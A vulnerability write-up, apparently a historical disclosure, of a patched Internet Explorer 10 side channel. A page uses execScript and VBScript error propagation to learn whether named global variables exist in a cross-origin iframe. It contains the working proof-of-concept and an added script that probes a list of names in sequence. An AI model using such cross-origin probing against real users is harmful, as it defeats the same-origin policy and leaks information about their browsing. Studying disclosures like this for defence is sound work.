IE's window.execScript can evaluate a string as VBScript. Evaluating the expression iFrame.<name> this way, where iFrame is a cross-origin frame, lets the parent probe whether a global variable of that name exists in the frame. If the variable exists, the resulting error fires only inside the iFrame's Trident; if it does not exist, the error propagates to both Tridents, so it can be detected from the parent's window.onerror handler. The existence of a cross-origin variable is therefore leaked as a one-bit error side channel.
// Parent page. Assumes an <iframe id="iFrame"> that points at the cross-origin
// target and an <input id="varName"> holding the name to probe.
var varExists = true;              // cleared when the error reaches the parent
window.onerror = function() {
  // A script error that propagated into the parent's Trident means the
  // probed variable does not exist in the cross-origin frame.
  varExists = false;
  return true;                     // suppress IE's script-error dialog
};
function showResult() {
  alert("Variable " + document.all.varName.value +
        (varExists ? " DOES " : " DOES NOT ") + "exist!");
  varExists = true;                // reset for the next probe
}
function main() {
  try {
    // Runs after the probe below, once onerror has had its chance to fire.
    setTimeout("showResult()");
    // Evaluate iFrame.<name> as VBScript: the error either stays inside the
    // iframe's Trident (variable exists) or reaches this window as well.
    execScript('iFrame.' + document.all.varName.value, 'VBScript');
  } catch(e) {}
}
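The PoC above probes one name per run. The following is an added example, not code from the original post: it sweeps a list of candidate global names through the same oracle, one at a time, since the shared window.onerror handler makes parallel probes ambiguous. The IE-specific calls (execScript, window.onerror, setTimeout) are taken from an injected env object so the scheduling logic can also be exercised outside IE10; ieEnv wires it to the real globals and the frame id "iFrame" assumed by the original PoC, while fakeEnv is a constructed stand-in that mimics the error behaviour described above. The candidate names are constructed, and the error message passed by fakeEnv is arbitrary.

```javascript
// Wire the probe to IE10's actual primitives. `frameId` is the id/name of the
// cross-origin <iframe> in the parent document ("iFrame" in the original PoC).
function ieEnv(frameId) {
  return {
    // Evaluate "<frameId>.<name>" as VBScript; the resulting script error is
    // either confined to the iframe's Trident or reaches this window too.
    probe: function (name) { execScript(frameId + '.' + name, 'VBScript'); },
    setOnError: function (handler) { window.onerror = handler; },
    defer: function (fn) { setTimeout(fn, 0); }
  };
}

// Probe a single name and call done(exists). One onerror handler is installed
// for the duration of the probe and removed before the result is reported.
function probeName(env, name, done) {
  var errorReachedParent = false;
  env.setOnError(function () {
    errorReachedParent = true;
    return true;                 // swallow the error; no dialog during the sweep
  });
  try { env.probe(name); } catch (e) { /* mirrors the try/catch in the PoC */ }
  // Give the error, if any, time to propagate before reading the flag (same
  // ordering as the setTimeout in the original PoC).
  env.defer(function () {
    env.setOnError(null);
    done(!errorReachedParent);   // error reached the parent => name does not exist
  });
}

// Probe names strictly sequentially; done(results) receives {name: exists}.
function probeNames(env, names, done) {
  var results = {};
  function next(i) {
    if (i === names.length) { return done(results); }
    probeName(env, names[i], function (exists) {
      results[names[i]] = exists;
      next(i + 1);
    });
  }
  next(0);
}

// Constructed stand-in for the IE oracle so the sweep can run anywhere: names
// listed in `existing` behave like variables that exist (the error stays in
// the iframe, so the parent's onerror is silent); any other name "propagates"
// to the parent's handler.
function fakeEnv(existing) {
  var handler = null;
  return {
    probe: function (name) {
      if (existing.indexOf(name) === -1 && handler) {
        handler('constructed script error', '', 0);
      }
    },
    setOnError: function (h) { handler = h; },
    defer: function (fn) { fn(); }
  };
}

// Real run, only meaningful inside IE10 with the iframe set up as described.
if (typeof window !== 'undefined' && typeof execScript === 'function') {
  probeNames(ieEnv('iFrame'), ['jQuery', 'angular', 'dojo'], function (r) {
    alert(JSON.stringify(r));
  });
}
```

Sequencing matters here: the flag is read only after the deferred callback runs, and the handler is uninstalled before the next name is probed, so one frame's error cannot be attributed to a later candidate.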
Beyond the variable guessing, the ability to inject a script error into a foreign-origin frame is itself worth noting. I could not construct anything directly harmful from the error injection alone, but cross-origin error injection is a capability the same-origin policy is supposed to rule out. Tested on Windows 8 with IE10.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.